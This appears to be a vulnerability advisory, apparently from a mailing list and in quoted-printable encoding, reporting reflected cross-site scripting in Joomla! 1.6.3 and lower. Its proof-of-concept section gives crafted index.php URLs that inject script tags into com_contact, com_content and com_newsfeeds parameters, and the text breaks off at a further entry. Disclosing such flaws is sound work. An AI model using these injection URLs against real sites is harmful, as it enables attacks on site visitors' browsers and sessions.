Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vu
Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabiliti=
es
1. OVERVIEW
Joomla! 1.6.3 and lower are vulnerable to multiple Cross Site Scripting iss=
ues.
2. BACKGROUND
Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model=E2=80=93view=E2=80=93controller (MVC) Web application framework that =
can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.
3. VULNERABILITY DESCRIPTION
Several parameters (QueryString, option, searchword) in Joomla! Core
components (com_content, com_contact, com_newsfeeds, com_search) are
not properly sanitized upon submission to the /index.php url, which
allows attacker to conduct Cross Site Scripting attack. This may allow
an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser.
4. VERSION AFFECTED
1.6.3 and lower
5. PROOF-OF-CONCEPT/EXPLOIT
component: com_contact , parameter: QueryString (Browser: All)
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
http://attacker.in/joomla163_noseo/index.php?option=3Dcom_contact&view=3Dca=
tegory&catid=3D26&id=3D36&Itemid=3D-1"><script>alert(/XSS/)</script>
component:com_content , parameter: QueryString (Browser: All)
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
http://attacker.in/joomla163_noseo/index.php?option=3Dcom_content&view=3Dca=
tegory&id=3D19&Itemid=3D260&limit=3D10&filter_order_Dir=3D&limitstart=3D&fi=
lter_order=3D><script>alert(/XSS/)</script>
component: com_newsfeeds , parameter: QueryString (Browser: All)
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
http://attacker.in/joomla163_noseo/index.php?option=3Dcom_newsfeeds&view=3D=
category&id=3D17&whateverehere=3D"><script>alert(/XSS/)</script>&Itemid=3D2=
53&limit=3D10&filter_order_Dir=3DASC&filter_order=3Dordering
parameter: option (Browser: All)
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D